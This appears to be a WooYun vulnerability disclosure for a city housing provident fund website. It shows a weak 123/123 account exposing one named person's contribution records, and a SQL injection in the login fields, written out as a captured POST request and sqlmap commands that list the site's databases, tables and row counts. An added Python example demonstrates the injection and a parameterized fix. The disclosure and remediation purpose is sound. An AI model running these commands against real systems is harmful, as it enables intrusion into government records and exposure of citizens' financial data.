
Vulnerability summary

Defect ID: wooyun-2015-0133483

Title: Anshan Housing Provident Fund Management Center user login has a weak username + weak password + SQL injection vulnerability

Vendor: Anshan Housing Provident Fund Management Center

Author: 毛毛虫

Submitted: 2015-08-14 10:30

Fix time: 2015-09-28 10:52

Published: 2015-09-28 10:52

Vulnerability type: SQL injection

Severity (self-assessed): Medium

Self-assessed Rank: 10

Status: Handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-14: Details sent to the vendor, awaiting vendor action
2015-08-14: CNCERT (National Internet Emergency Center) could not yet reach the affected organization; details disclosed only to the reporting body
2015-08-24: Details disclosed to core white hats and domain experts
2015-09-03: Details disclosed to regular white hats
2015-09-13: Details disclosed to intern white hats
2015-09-28: Details disclosed to the public

Brief description:

The login page of the Anshan (Liaoning Province) Housing Provident Fund Management Center has a weak username + weak password + SQL injection vulnerability. My previous submission failed verification because the steps were not detailed enough. Sorry to the reviewer for the extra work and for not writing it up clearly; the vulnerability does exist, so I have added detailed steps below. Please re-review.

Detailed description:

1. Login with a weak username + weak password
URL: http://**.**.**.**/index/index.aspx
Step 1: On the [User Hall] > [User Registration] page, enter username 123 and password 123; this logs in to a personal provident fund account.
Step 2: Choose [Provident Fund Account Management]; the contribution records of 张玲 at the Tiexi office are returned.

(screenshot: 0.jpg)


2. While logging in with a username and password, capture the POST request with Burp Suite and mark the injection points with * on the username and userpwd fields of the POST body (the login form is the left1$ control set posted to the article-search page):
POST /about/searcharticle.aspx?keyword=%27or%271%27%3d%271 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/about/searcharticle.aspx?keyword=%27or%271%27%3d%271
Cookie: ASPSESSIONIDQSATDCSQ=AOILFKDBJGAHJOEHOOPFLBEL; CNZZDATA1252918829=1080461807-1438877596-http%253A%252F%252F**.**.**.**%252F%7C1438877596; _5t_trace_sid=4d940fbb83749357633ba32c418fccd1; _5t_trace_tms=1; ASP.NET_SessionId=t0j5kw4505wwr545b0vi3zvw
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2596
__VIEWSTATE=%2FwEPDwUKMTIwMjE1NDkwOQ9kFgICAQ9kFgwCAw9kFgICAQ8WAh4JaW5uZXJodG1sBbYD44CA44CA5qC55o2u6L695a6B55yB55S16KeG55S16K%2Bd5Lya6K6u57K%2B56We77yM5Li65o6o6L%2Bb5oiR5biC5oi%2F5Zyw5Lqn5biC5Zy65bmz56iz5YGl5bq35Y%2BR5bGV77yM5L%2Bd6Zqc5L2P5oi%2F5YWs56ev6YeR57y05a2Y6ICF5ZCI5rOV5p2D55uK77yM5Zyo4oCc6Z6N5bGx5biC5L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW566h55CG5pqC6KGM5Yqe5rOV4oCd55qE5Z%2B656GA5LiK77yM5oiR5biC6L%2Bb5LiA5q2l5pS%2B5a695L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW5p2h5Lu277yM5Yeh5piv6LSt5Lmw5piO6L6%2B5ZWG5ZOB5L2P5oi%2F44CB5Yab5Lqn5L2P5oi%2F5Lul5Y%2BK6ZuG6LWE5bu65oi%2F5LiU5pyq5Lqr5Y%2BX5Yiw6LSt5oi%2F5o%2BQ5Y%2BW5L2%2F55So5YWs56ev6YeR55qE6IGM5bel77yM5q2k5qyh5Y%2Bv5Lul5o%2BQ5Y%2BW5L2P5oi%2F5YWs56ev6YeR6LSm5oi35a2Y5YKo5L2Z6aKd44CCZAIFDxYCHwAFFeWFs%2BmUruWtl%2B%2B8midvcicxJz0nMWQCBw88KwAJAQAPFgQeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50AgpkFhRmD2QWAmYPFQMBNTTpno3lsbHluILnrbnpm4bkvY%2FmiL%2Flhaznp6%2Fph5Hov5E15Lq%2F5Yib5Y6G5Y%2By5paw6auYCjIwMTQtMDgtMjdkAgEPZBYCZg8VAwE3POmejeWxseW4gjEuMeS6v%2BS9j%2BaIv%2BWFrOenr%2BmHkeS%2FnemanOiBjOW3peKAnOS9j%2BacieaJgOWxheKAnQoyMDE0LTA4LTI3ZAICD2QWAmYPFQMBOC3osIPmga%2FmlrDmlL%2FvvJrkvY%2FmiL%2Flhaznp6%2Fph5HnmoTigJzliKnlpb3igJ0KMjAxNC0wOC0yN2QCAw9kFgJmDxUDATkw5L2P5oi%2F5YWs56ev6YeR6Z2i5Li05YmN5omA5pyq5pyJ55qE5Y%2BR5bGV5py66YGHCjIwMTQtMDgtMjdkAgQPZBYCZg8VAwIxMU7pno3lsbHluILkvY%2FmiL%2Flhaznp6%2Fph5HnrqHnkIbkuK3lv4PokL3lrp7igJzlhajkvJrigJ3nsr7npZ7nqoHlh7rkuIDkuKrph43ngrkKMjAxNC0wOC0yN2QCBQ9kFgJmDxUDAjEyTumejeWxseW4guS9j%2BaIv%2BWFrOenr%2BmHkeeuoeeQhuS4reW%2Fg%2BiQveWunuKAnOWFqOS8muKAneeyvuelnuaQnuWlveS4pOS4quWIm%2BW7ugoyMDE0LTA4LTI3ZAIGD2QWAmYPFQMCMjBZ5YWz5rOo5rCR55Sf5qC55pysICDmnoTlu7rlkozosJDkurrlsYUoMjAxMOW5tOeni%2BWto%2BaIv%2BS6pOS8muW4guS9j%2BaIv%2BWFrOenr%2BmHkeacieaUv%2BetlikKMjAxNC0wOS0wNGQCBw9kFgJmDxUDAjIxLeaIkeW4guiwg%2BaVtOS4quS6uuS9j%2BaIv%2BWFrOenr%2BmHkei0t%2BasvuWIqeeOhwoyMDE0LTA5LTA0ZAIID2QWAmYPFQMCMjIw5oiR5biC5LiK6LCD5Liq5Lq65L2P5oi%2F5YWs56ev6YeR5a2Y6LS35qy%2B5Yip546HCjIwMTQtMDktMDRkAgkPZBYCZg8VAwIyMzDmiJHluILkuIrosIPkuKrkurrkvY%2FmiL%2Flhaznp6%2Fph5HlrZjotLfmrL7liKnnjocKMjAxNC0wOS0wNGQCCQ8PFgIeBFRleHQFClBhZ2U6IDEvMjhkZAIPDw8WBB8DBQnkuIvkuIDpobUeC05hdmlnYXRlVXJsBTIvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9MiZrZXl3b3JkPSdvcicxJz0nMWRkAhEPDxYEHwMFBuacq%2BmhtR8EBTMvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9Mjgma2V5d29yZD0nb3InMSc9JzFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUSbGVmdDEkSW1hZ2VCdXR0b24xUAzd9mixJFH3tLfGgdNzR%2B7%2FH%2FM%3D&__EVENTVALIDATION=%2FwEWBgKIgYWCBALpmoq1AgKa78TCCgKs65CWBwLwht75AwLb3M7HC3vabskDEiS5hR83Vtj5LGjBBvt8&left1%24username=1*&left1%24userpwd=1*&left1%24ImageButton1.x=22&left1%24ImageButton1.y=29
3. Because this site's POST body is large, save the captured request as a text file in the root of drive E, e.g. e:\asgjj.txt.
4. Run sqlmap either from the saved request file or by passing the request directly on the command line:
sqlmap.py -r e:\asgjj.txt -v 3 --dbs
or
sqlmap.py -u "http://**.**.**.**/about/searcharticle.aspx?keyword=%27or%271%27%3d%271" --data="__VIEWSTATE=%2FwEPDwUKMTIwMjE1NDkwOQ9kFgICAQ9kFgwCAw9kFgICAQ8WAh4JaW5uZXJodG1sBbYD44CA44CA5qC55o2u6L695a6B55yB55S16KeG55S16K%2Bd5Lya6K6u57K%2B56We77yM5Li65o6o6L%2Bb5oiR5biC5oi%2F5Zyw5Lqn5biC5Zy65bmz56iz5YGl5bq35Y%2BR5bGV77yM5L%2Bd6Zqc5L2P5oi%2F5YWs56ev6YeR57y05a2Y6ICF5ZCI5rOV5p2D55uK77yM5Zyo4oCc6Z6N5bGx5biC5L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW566h55CG5pqC6KGM5Yqe5rOV4oCd55qE5Z%2B656GA5LiK77yM5oiR5biC6L%2Bb5LiA5q2l5pS%2B5a695L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW5p2h5Lu277yM5Yeh5piv6LSt5Lmw5piO6L6%2B5ZWG5ZOB5L2P5oi%2F44CB5Yab5Lqn5L2P5oi%2F5Lul5Y%2BK6ZuG6LWE5bu65oi%2F5LiU5pyq5Lqr5Y%2BX5Yiw6LSt5oi%2F5o%2BQ5Y%2BW5L2%2F55So5YWs56ev6YeR55qE6IGM5bel77yM5q2k5qyh5Y%2Bv5Lul5o%2BQ5Y%2BW5L2P5oi%2F5YWs56ev6YeR6LSm5oi35a2Y5YKo5L2Z6aKd44CCZAIFDxYCHwAFFeWFs%2BmUruWtl%2B%2B8midvcicxJz0nMWQCBw88KwAJAQAPFgQeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50AgpkFhRmD2QWAmYPFQMBNTTpno3lsbHluILnrbnpm4bkvY%2FmiL%2Flhaznp6%2Fph5Hov5E15Lq%2F5Yib5Y6G5Y%2By5paw6auYCjIwMTQtMDgtMjdkAgEPZBYCZg8VAwE3POmejeWxseW4gjEuMeS6v%2BS9j%2BaIv%2BWFrOenr%2BmHkeS%2FnemanOiBjOW3peKAnOS9j%2BacieaJgOWxheKAnQoyMDE0LTA4LTI3ZAICD2QWAmYPFQMBOC3osIPmga%2FmlrDmlL%2FvvJrkvY%2FmiL%2Flhaznp6%2Fph5HnmoTigJzliKnlpb3igJ0KMjAxNC0wOC0yN2QCAw9kFgJmDxUDATkw5L2P5oi%2F5YWs56ev6YeR6Z2i5Li05YmN5omA5pyq5pyJ55qE5Y%2BR5bGV5py66YGHCjIwMTQtMDgtMjdkAgQPZBYCZg8VAwIxMU7pno3lsbHluILkvY%2FmiL%2Flhaznp6%2Fph5HnrqHnkIbkuK3lv4PokL3lrp7igJzlhajkvJrigJ3nsr7npZ7nqoHlh7rkuIDkuKrph43ngrkKMjAxNC0wOC0yN2QCBQ9kFgJmDxUDAjEyTumejeWxseW4guS9j%2BaIv%2BWFrOenr%2BmHkeeuoeeQhuS4reW%2Fg%2BiQveWunuKAnOWFqOS8muKAneeyvuelnuaQnuWlveS4pOS4quWIm%2BW7ugoyMDE0LTA4LTI3ZAIGD2QWAmYPFQMCMjBZ5YWz5rOo5rCR55Sf5qC55pysICDmnoTlu7rlkozosJDkurrlsYUoMjAxMOW5tOeni%2BWto%2BaIv%2BS6pOS8muW4guS9j%2BaIv%2BWFrOenr%2BmHkeacieaUv%2BetlikKMjAxNC0wOS0wNGQCBw9kFgJmDxUDAjIxLeaIkeW4guiwg%2BaVtOS4quS6uuS9j%2BaIv%2BWFrOenr%2BmHkei0t%2BasvuWIqeeOhwoyMDE0LTA5LTA0ZAIID2QWAmYPFQMCMjIw5oiR5biC5LiK6LCD5Liq5Lq65L2P5oi%2F5YWs56ev6YeR5a2Y6LS35qy%2B5Yip546HCjIwMTQtMDktMDRkAgkPZBYCZg8VAwIyMzDmiJHluILkuIrosIPkuKrkurrkvY%2FmiL%2Flhaznp6%2Fph5HlrZjotLfmrL7liKnnjocKMjAxNC0wOS0wNGQCCQ8PFgIeBFRleHQFClBhZ2U6IDEvMjhkZAIPDw8WBB8DBQnkuIvkuIDpobUeC05hdmlnYXRlVXJsBTIvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9MiZrZXl3b3JkPSdvcicxJz0nMWRkAhEPDxYEHwMFBuacq%2BmhtR8EBTMvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9Mjgma2V5d29yZD0nb3InMSc9JzFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUSbGVmdDEkSW1hZ2VCdXR0b24xUAzd9mixJFH3tLfGgdNzR%2B7%2FH%2FM%3D&__EVENTVALIDATION=%2FwEWBgKIgYWCBALpmoq1AgKa78TCCgKs65CWBwLwht75AwLb3M7HC3vabskDEiS5hR83Vtj5LGjBBvt8&left1%24username=1*&left1%24userpwd=1*&left1%24ImageButton1.x=22&left1%24ImageButton1.y=29" -v 3 --dbs

(screenshot: 2.jpg)


5. List all tables in the gjj database:
sqlmap.py -r e:\asgjj.txt -v 3 --dbs -D gjj --tables
or
sqlmap.py -u "http://**.**.**.**/about/searcharticle.aspx?keyword=%27or%271%27%3d%271" --data="__VIEWSTATE=%2FwEPDwUKMTIwMjE1NDkwOQ9kFgICAQ9kFgwCAw9kFgICAQ8WAh4JaW5uZXJodG1sBbYD44CA44CA5qC55o2u6L695a6B55yB55S16KeG55S16K%2Bd5Lya6K6u57K%2B56We77yM5Li65o6o6L%2Bb5oiR5biC5oi%2F5Zyw5Lqn5biC5Zy65bmz56iz5YGl5bq35Y%2BR5bGV77yM5L%2Bd6Zqc5L2P5oi%2F5YWs56ev6YeR57y05a2Y6ICF5ZCI5rOV5p2D55uK77yM5Zyo4oCc6Z6N5bGx5biC5L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW566h55CG5pqC6KGM5Yqe5rOV4oCd55qE5Z%2B656GA5LiK77yM5oiR5biC6L%2Bb5LiA5q2l5pS%2B5a695L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW5p2h5Lu277yM5Yeh5piv6LSt5Lmw5piO6L6%2B5ZWG5ZOB5L2P5oi%2F44CB5Yab5Lqn5L2P5oi%2F5Lul5Y%2BK6ZuG6LWE5bu65oi%2F5LiU5pyq5Lqr5Y%2BX5Yiw6LSt5oi%2F5o%2BQ5Y%2BW5L2%2F55So5YWs56ev6YeR55qE6IGM5bel77yM5q2k5qyh5Y%2Bv5Lul5o%2BQ5Y%2BW5L2P5oi%2F5YWs56ev6YeR6LSm5oi35a2Y5YKo5L2Z6aKd44CCZAIFDxYCHwAFFeWFs%2BmUruWtl%2B%2B8midvcicxJz0nMWQCBw88KwAJAQAPFgQeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50AgpkFhRmD2QWAmYPFQMBNTTpno3lsbHluILnrbnpm4bkvY%2FmiL%2Flhaznp6%2Fph5Hov5E15Lq%2F5Yib5Y6G5Y%2By5paw6auYCjIwMTQtMDgtMjdkAgEPZBYCZg8VAwE3POmejeWxseW4gjEuMeS6v%2BS9j%2BaIv%2BWFrOenr%2BmHkeS%2FnemanOiBjOW3peKAnOS9j%2BacieaJgOWxheKAnQoyMDE0LTA4LTI3ZAICD2QWAmYPFQMBOC3osIPmga%2FmlrDmlL%2FvvJrkvY%2FmiL%2Flhaznp6%2Fph5HnmoTigJzliKnlpb3igJ0KMjAxNC0wOC0yN2QCAw9kFgJmDxUDATkw5L2P5oi%2F5YWs56ev6YeR6Z2i5Li05YmN5omA5pyq5pyJ55qE5Y%2BR5bGV5py66YGHCjIwMTQtMDgtMjdkAgQPZBYCZg8VAwIxMU7pno3lsbHluILkvY%2FmiL%2Flhaznp6%2Fph5HnrqHnkIbkuK3lv4PokL3lrp7igJzlhajkvJrigJ3nsr7npZ7nqoHlh7rkuIDkuKrph43ngrkKMjAxNC0wOC0yN2QCBQ9kFgJmDxUDAjEyTumejeWxseW4guS9j%2BaIv%2BWFrOenr%2BmHkeeuoeeQhuS4reW%2Fg%2BiQveWunuKAnOWFqOS8muKAneeyvuelnuaQnuWlveS4pOS4quWIm%2BW7ugoyMDE0LTA4LTI3ZAIGD2QWAmYPFQMCMjBZ5YWz5rOo5rCR55Sf5qC55pysICDmnoTlu7rlkozosJDkurrlsYUoMjAxMOW5tOeni%2BWto%2BaIv%2BS6pOS8muW4guS9j%2BaIv%2BWFrOenr%2BmHkeacieaUv%2BetlikKMjAxNC0wOS0wNGQCBw9kFgJmDxUDAjIxLeaIkeW4guiwg%2BaVtOS4quS6uuS9j%2BaIv%2BWFrOenr%2BmHkei0t%2BasvuWIqeeOhwoyMDE0LTA5LTA0ZAIID2QWAmYPFQMCMjIw5oiR5biC5LiK6LCD5Liq5Lq65L2P5oi%2F5YWs56ev6YeR5a2Y6LS35qy%2B5Yip546HCjIwMTQtMDktMDRkAgkPZBYCZg8VAwIyMzDmiJHluILkuIrosIPkuKrkurrkvY%2FmiL%2Flhaznp6%2Fph5HlrZjotLfmrL7liKnnjocKMjAxNC0wOS0wNGQCCQ8PFgIeBFRleHQFClBhZ2U6IDEvMjhkZAIPDw8WBB8DBQnkuIvkuIDpobUeC05hdmlnYXRlVXJsBTIvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9MiZrZXl3b3JkPSdvcicxJz0nMWRkAhEPDxYEHwMFBuacq%2BmhtR8EBTMvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9Mjgma2V5d29yZD0nb3InMSc9JzFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUSbGVmdDEkSW1hZ2VCdXR0b24xUAzd9mixJFH3tLfGgdNzR%2B7%2FH%2FM%3D&__EVENTVALIDATION=%2FwEWBgKIgYWCBALpmoq1AgKa78TCCgKs65CWBwLwht75AwLb3M7HC3vabskDEiS5hR83Vtj5LGjBBvt8&left1%24username=1*&left1%24userpwd=1*&left1%24ImageButton1.x=22&left1%24ImageButton1.y=29" -v 3 --dbs -D gjj --tables

(screenshot: 3.jpg)


6. Get the row count of every table in the gjj database (a dump-size estimate rather than a full dump):
sqlmap.py -r e:\asgjj.txt -v 3 --dbs -D gjj --tables --count
or
sqlmap.py -u "http://**.**.**.**/about/searcharticle.aspx?keyword=%27or%271%27%3d%271" --data="__VIEWSTATE=%2FwEPDwUKMTIwMjE1NDkwOQ9kFgICAQ9kFgwCAw9kFgICAQ8WAh4JaW5uZXJodG1sBbYD44CA44CA5qC55o2u6L695a6B55yB55S16KeG55S16K%2Bd5Lya6K6u57K%2B56We77yM5Li65o6o6L%2Bb5oiR5biC5oi%2F5Zyw5Lqn5biC5Zy65bmz56iz5YGl5bq35Y%2BR5bGV77yM5L%2Bd6Zqc5L2P5oi%2F5YWs56ev6YeR57y05a2Y6ICF5ZCI5rOV5p2D55uK77yM5Zyo4oCc6Z6N5bGx5biC5L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW566h55CG5pqC6KGM5Yqe5rOV4oCd55qE5Z%2B656GA5LiK77yM5oiR5biC6L%2Bb5LiA5q2l5pS%2B5a695L2P5oi%2F5YWs56ev6YeR5o%2BQ5Y%2BW5p2h5Lu277yM5Yeh5piv6LSt5Lmw5piO6L6%2B5ZWG5ZOB5L2P5oi%2F44CB5Yab5Lqn5L2P5oi%2F5Lul5Y%2BK6ZuG6LWE5bu65oi%2F5LiU5pyq5Lqr5Y%2BX5Yiw6LSt5oi%2F5o%2BQ5Y%2BW5L2%2F55So5YWs56ev6YeR55qE6IGM5bel77yM5q2k5qyh5Y%2Bv5Lul5o%2BQ5Y%2BW5L2P5oi%2F5YWs56ev6YeR6LSm5oi35a2Y5YKo5L2Z6aKd44CCZAIFDxYCHwAFFeWFs%2BmUruWtl%2B%2B8midvcicxJz0nMWQCBw88KwAJAQAPFgQeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50AgpkFhRmD2QWAmYPFQMBNTTpno3lsbHluILnrbnpm4bkvY%2FmiL%2Flhaznp6%2Fph5Hov5E15Lq%2F5Yib5Y6G5Y%2By5paw6auYCjIwMTQtMDgtMjdkAgEPZBYCZg8VAwE3POmejeWxseW4gjEuMeS6v%2BS9j%2BaIv%2BWFrOenr%2BmHkeS%2FnemanOiBjOW3peKAnOS9j%2BacieaJgOWxheKAnQoyMDE0LTA4LTI3ZAICD2QWAmYPFQMBOC3osIPmga%2FmlrDmlL%2FvvJrkvY%2FmiL%2Flhaznp6%2Fph5HnmoTigJzliKnlpb3igJ0KMjAxNC0wOC0yN2QCAw9kFgJmDxUDATkw5L2P5oi%2F5YWs56ev6YeR6Z2i5Li05YmN5omA5pyq5pyJ55qE5Y%2BR5bGV5py66YGHCjIwMTQtMDgtMjdkAgQPZBYCZg8VAwIxMU7pno3lsbHluILkvY%2FmiL%2Flhaznp6%2Fph5HnrqHnkIbkuK3lv4PokL3lrp7igJzlhajkvJrigJ3nsr7npZ7nqoHlh7rkuIDkuKrph43ngrkKMjAxNC0wOC0yN2QCBQ9kFgJmDxUDAjEyTumejeWxseW4guS9j%2BaIv%2BWFrOenr%2BmHkeeuoeeQhuS4reW%2Fg%2BiQveWunuKAnOWFqOS8muKAneeyvuelnuaQnuWlveS4pOS4quWIm%2BW7ugoyMDE0LTA4LTI3ZAIGD2QWAmYPFQMCMjBZ5YWz5rOo5rCR55Sf5qC55pysICDmnoTlu7rlkozosJDkurrlsYUoMjAxMOW5tOeni%2BWto%2BaIv%2BS6pOS8muW4guS9j%2BaIv%2BWFrOenr%2BmHkeacieaUv%2BetlikKMjAxNC0wOS0wNGQCBw9kFgJmDxUDAjIxLeaIkeW4guiwg%2BaVtOS4quS6uuS9j%2BaIv%2BWFrOenr%2BmHkei0t%2BasvuWIqeeOhwoyMDE0LTA5LTA0ZAIID2QWAmYPFQMCMjIw5oiR5biC5LiK6LCD5Liq5Lq65L2P5oi%2F5YWs56ev6YeR5a2Y6LS35qy%2B5Yip546HCjIwMTQtMDktMDRkAgkPZBYCZg8VAwIyMzDmiJHluILkuIrosIPkuKrkurrkvY%2FmiL%2Flhaznp6%2Fph5HlrZjotLfmrL7liKnnjocKMjAxNC0wOS0wNGQCCQ8PFgIeBFRleHQFClBhZ2U6IDEvMjhkZAIPDw8WBB8DBQnkuIvkuIDpobUeC05hdmlnYXRlVXJsBTIvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9MiZrZXl3b3JkPSdvcicxJz0nMWRkAhEPDxYEHwMFBuacq%2BmhtR8EBTMvYWJvdXQvc2VhcmNoYXJ0aWNsZS5hc3B4P1BhZ2U9Mjgma2V5d29yZD0nb3InMSc9JzFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUSbGVmdDEkSW1hZ2VCdXR0b24xUAzd9mixJFH3tLfGgdNzR%2B7%2FH%2FM%3D&__EVENTVALIDATION=%2FwEWBgKIgYWCBALpmoq1AgKa78TCCgKs65CWBwLwht75AwLb3M7HC3vabskDEiS5hR83Vtj5LGjBBvt8&left1%24username=1*&left1%24userpwd=1*&left1%24ImageButton1.x=22&left1%24ImageButton1.y=29" -v 3 --dbs -D gjj --tables --count

(screenshot: 4.jpg)


The tables hold far too much data to dump one by one, so I stopped at the row counts.

Proof of vulnerability:

(screenshots: 0.jpg, 2.jpg, 3.jpg, 4.jpg)

Suggested fix:

Audit the login page and stop the username and password fields from reaching the SQL query as code (input filtering at minimum; parameterized queries are the reliable fix), and remove the weak 123/123 account.
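The following is an added example, not code from the report or from the provident fund site, showing the two findings side by side: the login query the report injects through the username/userpwd fields, the parameterized form the fix above calls for, and a minimal password policy that would have rejected 123/123. Only the field names and the `' or '1'='1` string come from the report; the table layout, the sample accounts and the use of sqlite3 in place of the site's real backend are assumptions made for the example.

```python
import sqlite3

# Constructed stand-in for the site's user table. The report only reveals the
# database name "gjj" and the form fields username/userpwd; the schema, the
# sample accounts and the sqlite3 backend are assumptions so the example runs
# offline. Passwords are kept in plaintext purely to keep the injection visible;
# a real system must store salted hashes.
USERS = [("123", "123"), ("zhangling", "S3cure!pw")]

PAYLOAD = "' or '1'='1"   # the boolean-true string from the report's URL, decoded


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, userpwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, userpwd):
    """Login check built by string concatenation, as a handler open to the
    injection in the report would do. Returns the matched username or None."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND userpwd = '" + userpwd + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, userpwd):
    """Same check with bound parameters: the inputs travel as data, so quotes
    and OR clauses never become part of the query text."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND userpwd = ?",
        (username, userpwd),
    ).fetchone()
    return row[0] if row else None


def password_acceptable(username, password, min_len=8):
    """Registration/reset-time policy that would have rejected 123/123:
    minimum length, not all digits, not equal to the username."""
    return (len(password) >= min_len
            and not password.isdigit()
            and password.lower() != username.lower())


def demo():
    """Runs the cases side by side and returns the outcomes."""
    conn = make_db()
    return {
        # the weak account still logs in through the fixed query: the credential
        # problem is separate from the injection and needs the policy check
        "weak_creds": login_fixed(conn, "123", "123"),
        # WHERE username = 'x' AND userpwd = '' or '1'='1'  -> every row matches
        "vuln_injected": login_vulnerable(conn, "x", PAYLOAD),
        # the same payload is compared literally against userpwd -> no match
        "fixed_injected": login_fixed(conn, "x", PAYLOAD),
        "weak_rejected": not password_acceptable("123", "123"),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result}")
```

Running it shows the injected password bypassing the concatenated query (the first account is returned without knowing any password) while the parameterized query returns nothing for the same input; note that parameterization does nothing about the 123/123 account, which is why the fix lists both changes.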

Copyright notice: please credit 毛毛虫@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-08-14 10:51

Vendor reply:

CNVD confirms the reported issue; it has been forwarded through CNCERT to the relevant branch center, which will coordinate remediation with the site's operating unit.

Latest status:

None yet